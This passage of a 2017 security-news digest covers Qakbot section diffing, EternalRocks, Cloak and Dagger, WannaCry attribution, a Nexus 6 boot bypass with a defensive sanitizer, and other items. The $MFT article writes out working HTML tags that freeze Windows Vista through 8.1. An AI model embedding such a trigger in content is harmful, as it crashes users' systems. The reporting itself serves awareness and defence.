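    """(index, name) of every section whose raw bytes differ between two samples."""
    _, ha = section_hashes(pe_a)
    _, hb = section_hashes(pe_b)
    if sorted(ha) != sorted(hb):
        raise ValueError("section layouts differ; compare manually")
    return [key for key in sorted(ha) if ha[key] != hb[key]]


def build_pe(sections, timestamp: int) -> bytes:
    """Constructed minimal PE container (headers plus raw sections, not loadable) for the demo."""
    opt_size = 224                                   # size of a PE32 optional header
    n = len(sections)
    hdr_len = 64 + 4 + struct.calcsize(COFF_FMT) + opt_size + n * struct.calcsize(SECT_FMT)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)   # e_lfanew at 0x3C points right after the DOS header
    coff = struct.pack(COFF_FMT, 0x14C, n, timestamp, 0, 0, opt_size, 0x102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)   # PE32 magic, rest zeroed
    table, raw, ptr, va = b"", b"", hdr_len, 0x1000
    for name, data in sections:
        table += struct.pack(SECT_FMT, name.encode().ljust(8, b"\0"), len(data), va, len(data), ptr, 0, 0, 0, 0, 0x60000020)
        raw += data
        ptr += len(data)
        va += 0x1000
    return dos + b"PE\0\0" + coff + opt + table + raw


# Constructed stand-ins for the two samples: same nine-section layout, only .text/.rdata/.data differ.
NAMES = [".text", ".code", ".rdata", ".data", ".CRT", ".exp", ".code", ".rsc", ".reloc"]
SAMPLE_A = build_pe([(n, ("A:" + n).encode().ljust(32, b"\0")) for n in NAMES], 1494806400)
SAMPLE_B = build_pe(
    [(n, (("B:" if n in (".text", ".rdata", ".data") else "A:") + n).encode().ljust(32, b"\0")) for n in NAMES],
    1494892800,
)

if __name__ == "__main__":
    print(changed_sections(SAMPLE_A, SAMPLE_B))  # [(0, '.text'), (2, '.rdata'), (3, '.data')]
```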

Different .text sections could reveal a change in executable code, and initial analysis revealed that all 27 functions identified matched 100%. Following deobfuscation, however, the security researchers discovered that nine functions had received some changes, albeit the overall Qbot functionality remained the same.

“Qakbot continues to be a significant threat due to its credential collection capabilities and polymorphic features. Unhindered, this malware family can rapidly propagate through network shares and create an enterprise-wide incident,” Cylance notes.

In an emailed comment to SecurityWeek, Michael Patterson, CEO of Plixer, pointed out that there is no shortage of vulnerabilities that malicious applications can exploit and that threats will continue to evolve. Thus, defense systems should adapt to ensure more efficient detection.

“Qakbot’s dynamic polymorphic abilities make it particularly evasive to antivirus systems. This means the virus can more easily maintain its presence without being detected," Patterson said. "It does however need to communicate on the network in order to carry out its dastardly deeds. In the case of Qakbot, it uses HTTPS to communicate with command-and-control (C&C) and FTP to upload stolen data. Network Traffic Analytics can be leveraged against flow data to watch for this one-two punch combination especially where odd FQDNs patterns are detected.”


3 Nigerian Scammers Get 235-Years of Total Jail Sentence in U.S.
26.5.2017 thehackernews  Crime
You may have heard of hilarious Nigerian scams. My all-time favourite is this one:
A Nigerian astronaut has been trapped in space for the past 25 years and needs $3 million to get back to Earth, Can you help?
Moreover, Nigerians are also good at promising true love and happiness.
But you know, love hurts.
Those looking for true love and happiness lost tens of millions of dollars over the Nigerian dating and romance scams.
These criminals spend their whole day trolling the online dating sites for contact emails and then send off hundreds of thousands of fraudulent emails awaiting the victim's response.
A US federal district court in Mississippi has sentenced three such Nigerian scammers to a collective 235 years in prison for their roles in a large-scale international fraud network that duped people out of tens of millions of dollars.
The three Nigerian nationals were part of a 21-member gang of cyber criminals, of which six, including Ayelotan, Raheem, and Mewase, were extradited from South Africa to the Southern District of Mississippi in July 2015 to face charges in the case.
Oladimeji Seun Ayelotan, 30, faces up to 95 years in prison
Rasaq Aderoju Raheem, 31, faces up to 115 years in prison
Femi Alexander Mewase, 45, faces up to 25 years in prison
A federal jury found all of them guilty of offenses involving mail fraud, wire fraud, credit card fraud, identity theft, and theft of government property, the US Department of Justice announced Thursday.
Also, Ayelotan and Raheem were found guilty of conspiracies to commit bank fraud and money laundering, which is why they have been given longer prison sentences.
Until now, the justice department has charged a total of 21 suspects in this case: 12 defendants have already pleaded guilty to charges related to the conspiracy while 11 have been sentenced to date.
The gang has been operating since 2001 and ran a variety of online scams, including romance scams, where the criminals used the false identity of love-struck girlfriends on a dating site to establish a romantic relationship with unsuspecting victims.
Once the gang members gained the victim's trust and affection, they would convince them to carry out their money laundering schemes and launder money from other rackets via MoneyGram and Western Union, or resend electronics and other goods bought with stolen credit cards to countries where they could be sold for a profit.
The gang members were arrested by South African police in a joint operation with U.S. Immigration and Customs Enforcement's Homeland Security Investigations (HSI) and the U.S. Postal Inspection Service in December 2015.
However, Nigerian scams will never die, and you could be their next victim.


Windows Vista through 8.1 contain a silly bug. Clicking a link freezes the system
26.5.2017 CNEWS.CZ Vulnerabilities

On habrahabr.ru, the author points out an unpleasant bug in Windows Vista and later (except Windows 10), or more precisely in their NTFS file system drivers. In the root directory of an NTFS volume there is a hidden file named $MFT that stores information about all files, folders and their metadata. Windows makes sure that nobody has access to it.

But if you try to open a non-existent file in a fictitious $MFT directory (for example C:\$MFT\ahoj), the $MFT file gets locked, which blocks all file operations. Applications and eventually the operating system freeze. Only a restart helps.

Windows crashed while trying to read the file c:\$MFT\ahoj

You don't have to open the fictitious file manually. Someone can reference it in HTML code, typically on a web page. I tried the bug on Windows 8.1. IE didn't resist. It was enough to open a local HTML file containing an image tag <img src="file:///C:/$MFT/ahoj">. Instead of an image, a link that has to be clicked can also be used: <a href="file:///C:/$MFT/ahoj">don't click</a>.

Chrome and Firefox withstood calling the file via an image tag, but after clicking the link they also froze, followed by Windows. However, this only worked with a locally stored HTML file. When I opened a remote one over the WWW, Chrome and Firefox were immune. Internet Explorer, however, went crazy again.

The system is not in danger during the attack and the target group is also fairly narrow, so most people have nothing to fear.

Incidentally, Windows 95 and 98 suffered from a similar bug. On them, the system ended with a blue screen of death if it tried to access c:/con/con or c:/aux/aux. The bug could also be exploited in chat services or e-mail clients with HTML message support. It was enough to call an image supposedly located at those addresses.



It didn't take long and Microsoft is shipping another batch of fixes to computers with Windows 10 v1703

26.5.2017 CNEWS.CZ Vulnerabilities

The fresh Windows release needs fixing.

Microsoft has released another cumulative update for Windows 10 v1703. It isn't Patch Tuesday, but the Creators Update is still quite fresh and going through a phase of intensive tuning. Microsoft is fixing problems on the fly thanks to feedback and gradually rolling the system out to more machines. So far it is found on only 18% of Windows 10 computers.

That is why the update was released only for version 1703, while Microsoft lets the older, already-tuned releases of Windows 10 sleep (until the next Patch Tuesday). The update is designated KB4020102 and raises the build number to 15063.332. It brings plenty of fixes:

  • The NTLM authentication protocol did not generate a correct response when CredGuard was active, NTLMv2 was in use at the same time, and the server supplied information about a non-existent target.

  • Internet Explorer, when opening favorites, did not respect the configured rule to send all pages not included in the Enterprise Mode site list to Edge.

  • In a standard user account without administrator rights, it was not possible to install ActiveX controls in Internet Explorer 11.

  • Some applications stopped responding to input if you used multiple displays at the same time and arranged two applications side by side on one of them so that together they filled the whole screen.

  • In some account sign-in dialogs a scrollbar was displayed quite unnecessarily. Moreover, it could block some fields.

  • A virtual machine could, after a reset, start using Second Level Paging (used when memory is running low) even though the host machine still had plenty of memory.
    A new batch of fixes for the Creators Update

  • With some fonts that do not support Unicode, e.g. Courier or MS Sans Serif, characters were not rendered correctly. This affected only some language versions of Windows.

  • The SMS messaging app stopped working when trying to delete messages.

  • After installing the Creators Update, external audio decoders might not work, so there was no audio output.

  • The IoT environment failed to track background apps.

  • When using the MIDI API for the Universal Windows Platform, high latency was noticeable.

  • When using the manufacturer's software, it was not possible to install a network printer on computers with less than 4 GB of RAM.

  • PrintBRM failed to restore print queue settings if printers with the same name existed on the system and the port was set to FILE:.

  • Proxy settings in user accounts might not be transferred to the system proxy settings.


The EternalRocks malware is an even more serious threat than WannaCry

26.5.2017 SecurityWorld Viruses
Trend Micro warns of the insidious EternalRocks network worm from the Shadowbroker hacker group, which uses more malicious tools than WannaCry.

Trend Micro warns of new malware called EternalRocks. The National Cyber Security Centre has also issued a warning about the threat. Unlike the WannaCry ransomware, EternalRocks does not use only two leaked National Security Agency (NSA) tools, EternalBlue and DoublePulsar. It uses five more: EternalChampion, EternalRomance, EternalSynergy, ArchiTouch and SMBTouch. It spreads by exploiting flaws in the SMB file-sharing protocol in Windows.

The new malware strain was first identified by Miroslav Stampar, a security researcher and member of the Croatian government security team. He found that EternalRocks works in two stages. First it downloads a TOR client, which it uses as a communication channel to reach the command and control server. Surprisingly, the reply does not come immediately but only after 24 hours, apparently so that the malware fools sandboxes and security analysis.

The reply arrives in the form of the main component, taskhost.exe, which produces a zipped file, shadowbroker.zip, containing the NSA tools. After unpacking the file, EternalRocks starts scanning the internet for systems with port 445 open, which serves as the gateway for the network worm. Some of the vulnerabilities exploited by EternalRocks were fixed by Microsoft's March update MS17-010.

Unlike WannaCry, EternalRocks does not look so dangerous at first glance because it has no harmful payload: it demands no ransom and locks no files. It does, however, hide dangerous potential should someone weaponize it. Moreover, EternalRocks has no built-in "kill switch" that would make it easy to shut down.

So whoever was not persuaded to update their system even by the WannaCry attack will hopefully be convinced by the potentially even more dangerous EternalRocks malware. Since it uses the same exploits as WannaCry, users and network administrators should update and secure their systems immediately. With both threats it pays to remember that prevention is easier than cleaning up after a lost battle with malware.


Prevent data loss: what are the most common causes of problems?

26.5.2017 SecurityWorld Security
We bring you an overview of the mistakes by which individual employees and IT departments most often contribute to the theft or loss of sensitive company data, together with advice on how best to avoid these slips.

According to a 2016 IBM study on the costs arising from data theft or loss, the average amount climbed from 3.8 million dollars to 4 million.

At a more detailed level, the study reveals that the average value of each lost or stolen record containing sensitive and confidential information rose from 154 to 158 dollars. Losing company data is simply no joke financially, and leaks can also harm a company in other ways, e.g. by damaging its reputation with clients and partners.

David Zimmerman, CEO and founder of LC Technology, describes the five most common mistakes.

Advanced settings

Advanced settings on computers are not there for nothing. They are a warning to the user, who should know very well what they are doing or about to do. A typical example of such settings is the BIOS: changing the BIOS setup is usually well-intentioned, but in this case the road to hell really is paved with good intentions.

Advanced settings that can significantly change how a computer works and alter its security should always be changed by experienced IT technicians in a secure environment. This considerably reduces the chance of data loss.

Ignoring the possibility of hardware failure

As cloud solutions gradually fill the market, the risk of data loss due to computer failure decreases. HDDs and SSDs can be damaged and often simply wear out over time; from those, however, it is usually still possible to recover part of the data.

The PC power supply also often causes problems. Although it does not directly endanger data, it still causes additional costs: a laptop, or rather a server, holding the data the company needs to operate cannot simply go in for repair without affecting the running of the business.

Secured portable storage devices such as flash drives, or cloud storage, mean a greater degree of protection of data against loss (though not against theft).

Ignoring security protocols

Many of the "hacker attacks" we read about in the news are caused by employee error; in fact, most of them. Setting the administrator password to "12345" or opening an e-mail attachment from an unknown address are among such mistakes.

Clicking on ads on dangerous and disreputable websites is just as bad. Strict password management and enforcing security standards when working with the internet lead to a significant reduction in the chance of data leaks; a well-secured company is a less attractive target for hackers.

Although a determined team of skilled criminals can break even very, very good security, the most attractive targets for them are those businesses from which they can get money easily, i.e. those with the worst security. Also insist on sufficiently complex passwords that combine lowercase and uppercase letters with numbers.

Poor backups

A very common reason for data loss is storing it on local storage without any further backup. It is 2017, and external storage is not only very cheap but also offers many different solutions, both cloud and physical server. Compared to the cost of lost data, backup storage is really cheap.

Another option is backing up to several different clouds at once, or to a cloud and a physical medium at the same time; then, in the event of hardware failure or human error, the valuable information is easily replaceable.

Ransomware

Extortion practices have recently become very popular in hacker circles and in cybercrime in general. The easiest way to extort a computer user is ransomware. Ransomware takes over the files on the user's computer and encrypts them, then demands that the victim send money, after which they receive the decryption key.

Ransomware most often gets into a computer through an e-mail attachment or by cracking or guessing a password. Data theft comes at the moment when the hackers have time between infecting the computer and the payment arriving in their account. More often, though, even when payment arrives, the hackers do not unlock the data and either leave it encrypted or destroy it.


All Android Phones Vulnerable to Extremely Dangerous Full Device Takeover Attack
26.5.2017 thehackernews Android
Researchers have discovered a new attack, dubbed 'Cloak and Dagger', that works against all versions of Android, up to version 7.1.2.
Cloak and Dagger attack allows hackers to silently take full control of your device and steal private data, including keystrokes, chats, device PIN, online account passwords, OTP passcode, and contacts.
What's interesting about Cloak and Dagger attack?
The attack doesn't exploit any vulnerability in the Android ecosystem; instead, it abuses a pair of legitimate app permissions that are widely used in popular applications to access certain features on an Android device.
Researchers at the Georgia Institute of Technology discovered this attack and successfully performed it on 20 people, none of whom were able to detect any malicious activity.
Cloak and Dagger attacks utilise two basic Android permissions:
SYSTEM_ALERT_WINDOW ("draw on top")
BIND_ACCESSIBILITY_SERVICE ("a11y")
The first permission, known as "draw on top," is a legitimate overlay feature that allows apps to overlap on a device's screen and top of other apps.
The second permission, known as "a11y," is designed to help disabled, blind and visually impaired users, allowing them to enter inputs using voice commands, or listen content using screen reader feature.
Scary Things Hackers Can Do to Your Android (Demo)
Since the attack does not require any malicious code to perform the trojanized tasks, it becomes easier for hackers to develop and submit a malicious app to Google Play Store without detection.
Unfortunately, it’s a known fact that the security mechanisms used by Google are not enough to keep all malware out of its app market.
If you are following regular security updates from The Hacker News, you must be better aware of frequent headlines like, "hundreds of apps infected with adware targeting play store users," and "ransomware apps found on play store."
Just last month, researchers uncovered several Android apps masquerading as an innocent "Funny Videos" app on Play Store with over 5,000 downloads that distributed the 'BankBot banking Trojan', which steals victims' banking passwords.
Here's how the researchers explained getting onto the Google Play Store to perform Cloak & Dagger attacks:
"In particular, we submitted an app requiring these two permissions and containing a non-obfuscated functionality to download and execute arbitrary code (attempting to simulate a clearly malicious behavior): this app got approved after just a few hours (and it is still available on the Google Play Store)." researchers say.
Once installed, the researchers say the attacker can perform various malicious activities including:
Advanced clickjacking attack
Unconstrained keystroke recording
Stealthy phishing attack
Silent installation of a God-mode app (with all permissions enabled)
Silent phone unlocking and arbitrary actions (while keeping the screen off)
In short, the attackers can secretly take over your Android device and spy on everything you do on your phone.
Researchers have also provided the video demonstrations of a series of Cloak and Dagger attacks, which will blow your mind, trust me.


Google Can’t Fix It, At Least Not So Fast
University researchers have already disclosed this new attack vector to Google but noted that since the issue resides in the way Android OS has been designed, involving two of its standard features that behave as intended, the problem could be difficult to resolve.
"Changing a feature is not like fixing a bug," said Yanick Fratantonio, the paper's first author. "System designers will now have to think more about how seemingly unrelated features could interact. Features do not operate separately on the device."
As we reported earlier, Google gives "SYSTEM_ALERT_WINDOW" ("draw on top") permission to all applications directly installed from the official Google Play Store since Android Marshmallow (version 6), launched in October 2015.
This feature that lets malicious apps hijack a device's screen is one of the most widely exploited methods used by cyber criminals and hackers to trick unwitting Android users into falling victims for malware and phishing scams.
However, Google has planned to change its policy in 'Android O,' which is scheduled for release in the 3rd quarter this year.
So, users need to wait for a long, long time, as millions of users are still waiting for Android Nougat (N) from their device manufacturers (OEMs).
In other words, the majority of smartphone users will continue to be victimised by ransomware, adware and banking Trojans for at least the next year.
Temporary Mitigation
The easiest way to disable the Cloak and Dagger attacks in Android 7.1.2 is to turn off the "draw on top" permission by heading on to:
Settings → Apps → Gear symbol → Special access → Draw over other apps.
The universal and easiest way to avoid being hacked is always to download apps from Google Play Store, but only from trusted and verified developers.
You are also advised to check app permissions before installing apps. If any app is asking more than what it is meant for, just do not install it.


Terra Privacy Product Uses Dynamic Whitelisting to Block Attacks

26.5.2017 securityweek Safety
Terra Privacy announced on Wednesday a new product that uses dynamic whitelisting to block malware and phishing attacks. A free beta version of the endpoint security product is available for testing.

Terra Privacy was founded by Michael Wood, the cryptographer who designed the REDOC II encryption system. The company’s latest product, Hacker Deterrent Pro, uses dynamically-generated whitelists to ensure that web browsers and other applications only communicate with the servers they are supposed to.

Hacker Deterrent Pro has three main features: Two-Factor Browsing, App Firewall, and DNS Shield.

Two-Factor Browsing ensures that the browser only communicates with trusted domains. To achieve this, the product creates a real-time transient whitelist that contains only the names of webpages opened by the user and the names of other sites from which content is pulled, while any other connection attempt is blocked.

This prevents browser-based threats from communicating with their command and control (C&C) servers, and it can also be used to block commercial trackers.

Traditional whitelisting can be impractical as users have to manually add each website. Hacker Deterrent aims to address this problem by creating transient whitelists that are empty when the web browser is first opened. Each time the user visits a website, that site is automatically added to the whitelist and removed from the whitelist when the page is closed.

This method can also be efficient against sophisticated phishing attacks as Hacker Deterrent Pro will block unauthorized domains even if they look legitimate. The vendor demonstrated its product’s capabilities by showing how it could block phishing sites that use a recently disclosed Unicode-based technique.

According to the company, the solution can also block non-browser Trojans that inject themselves into running processes by preventing them from communicating with domains other than ones belonging to the hijacked app’s developer. For example, the explorer.exe process, which is often targeted by malware, should only be allowed to communicate with Microsoft servers.

The app firewall initially blocks all applications from accessing the Web, and provides information about the app and the host it wants to connect to, allowing users to determine if the connection should be allowed.

The product’s DNS Shield allows users to select DNS servers based on their personal preferences, blocking ISPs from adding their own list of DNS servers. For instance, users can choose DNS servers that reject connections to IPs that are known to host malware.

The beta version of Hacker Deterrent Pro can be tested for free. The commercial version of the product, expected to become available in mid-July, will cost $39.99 per year per endpoint. The solution works on Windows PCs using the Chrome and Firefox web browsers.


Survey Shows Disparity in GDPR Preparedness and Concerns

26.5.2017 securityweek Privacy
The European General Data Protection Regulation will take effect in exactly one year from today. It will affect any company that does business with the EU, whether that company is based in Europe or elsewhere (such as the US). While there have been many surveys indicating that affected firms are far from prepared, there are few that highlight the geographic disparity in readiness.

One Year Out: Views on GDPR (PDF), conducted by Vanson Bourne for Varonis, is particularly detailed. It surveyed 500 IT decision makers in organizations with more than 1,000 employees in the US (200), the UK (100), Germany (100) and France (100). Unlike many such surveys, it includes the raw data, allowing readers to dig deep into areas of interest or concern.

Unsurprisingly, given other surveys, the headline result is that 75% of respondents "face serious challenges in being compliant with the EU GDPR by 25th May 2018." This result is consistent across all four nations; but those who strongly agree range from 15% in the UK (the lowest) to 25% (the highest) in the US.

The cause of this disparity may be found in senior management's attitude towards GDPR. Overall, 42% of companies do not view compliance by the deadline as a priority. Thirteen percent of firms 'strongly agree' with this -- but the detail ranges from just 6% in the UK to 19% in the US (France and Germany are equal at 10%).

It is tempting to suggest that this is influenced by history: the UK regulator has traditionally been 'business-friendly', allowing companies to be more relaxed towards data protection than their counterparts in France and Germany. US companies (apart from the major tech firms such as Google, Facebook and Microsoft) have little experience of European regulators.

But while the survey may indicate a lack of urgency at the management level, the respondents themselves indicate serious concern over the potential effect of GDPR. Overall, 75% of respondents believe that fines imposed for breaching regulations could cripple some organizations. Here, US concerns (81%) are above average, with France being the least concerned at 64%. It would appear that US practitioners are more concerned about GDPR than are their managers.

The survey also provides detail on what aspects of GDPR are most concerning. Not surprisingly, the erasure right (the right-to-be-forgotten) in Article 17 tops the list at 55% overall. Somewhat surprisingly given the apparent link between this and the American constitutional right to freedom of speech, the US respondents were the least concerned at 48%. Equally surprising, UK concern was by far the highest at 71%.

The second biggest concern is the requirement for processing activities, contained in Article 30; that is, visibility into and control over who has access to the data. Overall concern was steady at 52%, with regional variations limited to the lowest at 50% (UK) and the highest at 53% (US).

"What's most worrying about the findings," comments Matt Lock, director of sales engineers at Varonis, "is that one in four organizations doesn't have a handle on where its sensitive data resides. These companies are likely to have a nasty wake-up call in one year's time. If they don't have this fundamental insight into where sensitive data sits within their organizations and who can and is accessing it, then their chances of getting to first base with the regulations are miniscule and they are putting themselves firmly at the front of the queue for fines."

The concern showing the greatest disparity is over data protection by design (Article 25). The least concern comes from France at 35%, with the highest from the US at 55% (this is the highest of all concerns for the US respondents). It seems to reflect a general concern that GDPR might impinge on innovation -- with the highest concern coming from perhaps the most entrepreneurial nation.

It would be wrong, however, to think that the respondents have only negative thoughts and worries about GDPR. Thirty-six percent of respondents believe it will be very beneficial for both consumers and organizations. This, however, ranges from a very low 12% in the UK to an encouraging 47% in the US. In purely business terms, 57% of UK respondents believe it will prove troublesome for organizations, while only 36% of US respondents think the same.

The top benefit for private citizens is that their personal data will be better protected (54%). The UK (61%) and the US (59%) lead France (45%) and Germany (47%) in this. The order is reversed, however, over whether GDPR will make it less likely that PII will be passed to third parties. The UK (24%) and the US (32%) are behind both France (35%) and Germany (36%). Confirming these views, very few respondents could see no benefits from GDPR -- and most of those seem to be in the UK (11%). Only 5% of US organizations hold a similar view.

A particularly interesting section of the report deals with expected outcomes from the GDPR, with wide variations on which regulator is expected to be the most stringent. Overall, Germany tops the list at 76%, with German respondents in the lead at 85%. The UK is second overall at 57% -- which could be surprising given the UK regulator's soft historical approach and the UK government's insistence that it will implement GDPR in as business-friendly a manner as possible. This view is distorted, however, by the UK and US respondents' score of 76% each. France (35%) and Germany (24%) are far less confident that the UK regulator will be rigorous.

Ninety-two percent of respondents suspect a particular industry will be singled out as an example in the event of a breach. Banking is seen as the most likely at 26% overall. This figure is distorted by the UK response at 52%. Both France and Germany individually believe that any example will more likely come from the technology and telecommunications industry.

A high number of respondents (82%) also believe that a particular country will be singled out if one of their organizations is in breach of GDPR. The overall favorite is the UK at 23% -- but this is distorted by the UK respondents (48%) who are perhaps concerned with the after effects of Brexit. Noticeably, only 2% of French and 11% of German respondents have a similar view.

Nevertheless, 68% of respondents believe that a UK company (as opposed to the UK in general) will be singled out and punished because of Brexit. This belief is strongest in the US (77%) and the UK (70%), and less so, but still high, in France (58%) and Germany (57%).

What this survey shows above all is that while there is a general lack of preparedness for GDPR among most organizations, specific concerns and expectations can vary widely between the different nations. The level of detail provided goes far beyond many similar surveys, and allows individual readers to dig deeper into specific areas. The value in this is that by evaluating other countries' and organizations' concerns, individual readers can rate their own preparedness.


Endpoint Security Firm Tanium Raises $100 Million

26.5.2017 securityweek Security
Emeryville, CA-based endpoint security and systems management firm Tanium announced on Thursday that it has raised $100 million through the sale of common stock.

The latest funding round was led by TPG Growth and it brought in a new investor. The $100 million raised through the issuance of common stock – previous funding rounds offered only preferred stock – brings the company’s value to $3.75 billion.

Part of the proceeds have been used to repurchase shares from David Hindawi, co-founder and executive chairman of Tanium, to allow him to fund his charity projects. The rest will be used to provide liquidity to early employees and investors, and for general corporate purposes.


With this funding round, Tanium has raised a total of $407 million. The company reported a revenue growth of more than 100% last year, and it claims to have brought on board nearly 100 new enterprise customers. Clients include U.S. government agencies, 12 of the top 15 banks, and six of the top 10 retailers.

The company’s plans for the future include expansion in the EMEA and APAC regions, establishing a strong presence in the media and manufacturing sectors, further investment into IT operations products and modules, and growth in existing industries.

“Tanium is unique in our industry. In contrast to the cybersecurity-only companies, we provide an endpoint platform that allows communication for massive numbers of assets in a way enterprises have never had before, which is useful across not only security but also operations issues in IT,” said Tanium CEO Orion Hindawi.

“Because of that breadth of offering, our investors see Tanium having longevity and potential that exceeds the typical cybersecurity landscape, and we will work hard to continue proving them right by driving our platform further into both security and operations with each passing quarter,” he added.

Last month, Hindawi published an open letter addressing accusations that the company exposed a California hospital’s network during sales demos, and reports of a toxic staff relations culture.


Linguistic Analysis Suggests WannaCry Authors Speak Chinese

26.5.2017 securityweek  Ransomware

A linguistic analysis of more than two dozen ransom notes displayed by the WannaCry ransomware suggests that its authors are fluent Chinese speakers and they also appear to know English.

While malware code similarities suggest that WannaCry has been developed by the North Korea-linked threat actor known as Lazarus, some believe the attack does not fit Pyongyang’s style and interests.

Researchers at threat intelligence firm Flashpoint have analyzed 28 WannaCry ransom notes, including ones written in Chinese (both simplified and traditional), Danish, Dutch, English, French, German, Indonesian, Italian, Japanese, Korean, Norwegian, Portuguese, Romanian, Russian, Spanish, Swedish and Turkish.

The linguistic analysis showed that there are significant differences between the notes written in Chinese and the ones written in other languages. Evidence suggests that the Chinese note, which mostly uses proper grammar, punctuation and syntax, was actually written with a Chinese-language keyboard.

One of the words used in the Chinese note is more common in South China, Hong Kong, Singapore and Taiwan, while another term is more widely used in mainland China.

Experts pointed out that the note written in Chinese includes a significant amount of content that is not present in other versions, and they believe it may have served as the source for the English version.

The English note is also well written, but it contains a major grammar mistake that suggests its author is either not a native speaker or possibly someone who is not well educated.

Flashpoint has determined that the English note served as the source for translating the text into the other languages using a service such as Google Translate. Tests conducted by the researchers show a match of at least 96 percent between the WannaCry notes and Google-translated versions of the English message.

While WannaCry may have been developed by more than one individual, Flashpoint said with high confidence that the Chinese-language ransom note was written by someone who is fluent in Chinese. The English note was written by someone who knows English, but does not appear to be a native speaker, the company said.

“Given these facts, it is possible that Chinese is the author(s)’ native tongue, though other languages cannot be ruled out,” Flashpoint said. “It is also possible that the malware author(s) intentionally used a machine translation of their native tongue to mask their identity. It is worth noting that characteristics marking the Chinese note as authentic are subtle. It is thus possible, though unlikely, that they were intentionally included to mislead.”

While security firms such as Symantec and Kaspersky presented evidence linking WannaCry to North Korea, Cybereason questioned the apparent connection, pointing to differences in tactics and the fact that two of the most impacted countries, Russia and China, are North Korea’s biggest allies.

Researchers at Flashpoint are not the only ones who mentioned China. James Scott, a senior fellow at the Institute for Critical Infrastructure Technology, also believes the attack may have been conducted by hackers from China's People's Liberation Army "moonlighting" in their spare time, or freelance Chinese hackers hired by Pyongyang.


Google Patches Nexus 6 Secure Boot Bypass

26.5.2017 securityweek Android
One of the vulnerabilities addressed by Google in its May 2017 security patches allowed the bypass of Nexus 6’s Secure Boot through kernel command-line injection, HCL Technologies researchers reveal.

By exploiting the flaw, an attacker with physical access to the device or one with authorized-ADB/fastboot USB access to the (bootloader-locked) device could gain unrestricted root privileges and “completely own the user space.” For that, the attacker would have to load a tampered or malicious initramfs image.

Security researcher Roee Hay also explains that, because the exploitation doesn’t lead to a factory reset, user data remains intact and still encrypted. The vulnerability is tracked as CVE-2016-10277.

The issue, Hay says, is a continuation of CVE-2016-8467, a High risk vulnerability affecting the Nexus 6/6P bootloader, and which was addressed in Google’s January 2017 security patches. The exploit abused fastboot commands to change the androidboot.mode argument in the kernel command line and was addressed by hardening the bootloader.

“Just before Google released the patch, we had discovered a way to bypass it on Nexus 6,” the researcher notes.

Because the fsg-id, carrier and console arguments in Nexus 6’s bootloader can be controlled through the fastboot interface (even when the bootloader is locked), one could pass arbitrary kernel command line arguments if the bootloader did not sanitize those three arguments. The researchers also found a series of parameters that can contain arbitrary values and which propagate to the kernel command line.

After previously discovering they could tamper with the bootmode, the researchers focused on finding ways to compromise a device further by inserting arbitrary arguments into the command line. Eventually, they discovered that they could defeat Secure Boot by being able to control a single argument.

The exploit relies on initramfs, a cpio (gzipped) archive that gets loaded into rootfs (a RAM filesystem) during the Linux kernel initialization. The bootloader prepares the kernel command line and initramfs parameters for the Linux kernel in the Device Tree Blob, and then transfers execution to the Linux kernel.

The kernel_init function executes the first userspace process, /init, and the kernel command line argument rdinit can override this default. Exploitation through rdinit was not effective, however, mainly because the Nexus 6 initramfs does not contain a large enough set of binaries, the researcher notes.

“Interestingly, we’ve realized that in arm, it is also possible to control, through a kernel command line argument initrd, the physical address where the initramfs is loaded from by the kernel,” Hay says.

By overriding the default values provided by the bootloader in the Device Tree Blob, the researchers caused the kernel to crash. Next, they focused on loading their own initramfs archive into the device’s memory through fastboot.

“Note that the Linux Kernel does not re-verify the authenticity of initramfs, it relies on the bootloader to do that, so if we manage to put a tampered initramfs at the controlled phys_initrd_start physical address, the kernel will indeed populate it into rootfs,” the researcher explains.

Fastboot offers a download mechanism via USB and, because the operation is available even on locked bootloaders, an attacker can abuse it to load a tampered initramfs onto the device. The exploit then succeeds if the bootloader and kernel do not overwrite the data before the initramfs is populated into rootfs.

The security researchers created a Proof-of-Concept initramfs and made it publicly available on GitHub. Upon gaining full control of rootfs, an attacker can create a malicious /vendor folder, where firmware images of various SoCs available on the board would normally be saved.

“Kernel drivers usually consume these images upon initialization, and update their SoC counterparts if needed. Hence, the attacker could flash unsigned firmware images. We haven’t checked if there are such, but from our experience with other devices, there are. As for signed ones, downgrade attacks might be possible as well,” Hay says.

Google addressed the issue in the May 2017 set of monthly patches by setting the bootloader to sanitize the fsg-id, carrier and console config arguments.
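The fix described above (sanitizing the fastboot-controlled arguments before they reach the kernel command line), illustrated in Python as an added example; this is not Google's or HCL's code. It assumes a bootloader that accepts a small set of values over fastboot (the article names fsg-id, carrier and console) and appends each as key=value to a trusted base command line. The rule it enforces is that a value must not be able to close its own token or open a new one, so whitespace and quotes are rejected; the per-key character classes, the base command line and the sample values are assumptions made for the example.

```python
"""Sanitizer for kernel command-line values that reach a bootloader from fastboot.

Added illustration, not Google's or HCL's code. Assumes the bootloader appends
fastboot-supplied values as key=value tokens to a trusted base command line.
"""
import re

# Keys the article says are reachable from fastboot even on a locked bootloader.
FASTBOOT_CONTROLLED_KEYS = ("fsg-id", "carrier", "console")

# Per-key allow-patterns (assumed for this example). None admits whitespace,
# quotes or non-printable characters, which is what keeps a value inside its token.
VALUE_RULES = {
    "fsg-id": re.compile(r"[A-Za-z0-9._-]{1,32}"),
    "carrier": re.compile(r"[A-Za-z0-9._-]{1,32}"),
    # console=ttyHSL0,115200,n8 : a device name plus up to three comma-separated options
    "console": re.compile(r"[A-Za-z0-9]{1,16}(?:,[A-Za-z0-9]{1,16}){0,3}"),
}


class UnsafeCmdlineValue(ValueError):
    """Raised when a fastboot-supplied value could alter the kernel command line."""


def validate_value(key, value):
    """Return value unchanged if it fully matches the key's pattern, else raise."""
    rule = VALUE_RULES.get(key)
    if rule is None:
        raise KeyError(f"{key!r} is not a fastboot-controlled key")
    if not isinstance(value, str) or rule.fullmatch(value) is None:
        raise UnsafeCmdlineValue(f"{key}: rejected {value!r}")
    return value


def is_safe_value(key, value):
    try:
        validate_value(key, value)
        return True
    except UnsafeCmdlineValue:
        return False


def build_cmdline_unchecked(base, fastboot_values):
    """The pre-fix behaviour: values are concatenated without inspection."""
    parts = [base.strip()]
    for key in FASTBOOT_CONTROLLED_KEYS:
        if key in fastboot_values:
            parts.append(f"{key}={fastboot_values[key]}")
    return " ".join(parts)


def build_cmdline(base, fastboot_values):
    """Hardened builder: every fastboot-supplied value is validated first."""
    parts = [base.strip()]
    for key in FASTBOOT_CONTROLLED_KEYS:
        if key in fastboot_values:
            parts.append(f"{key}={validate_value(key, fastboot_values[key])}")
    return " ".join(parts)
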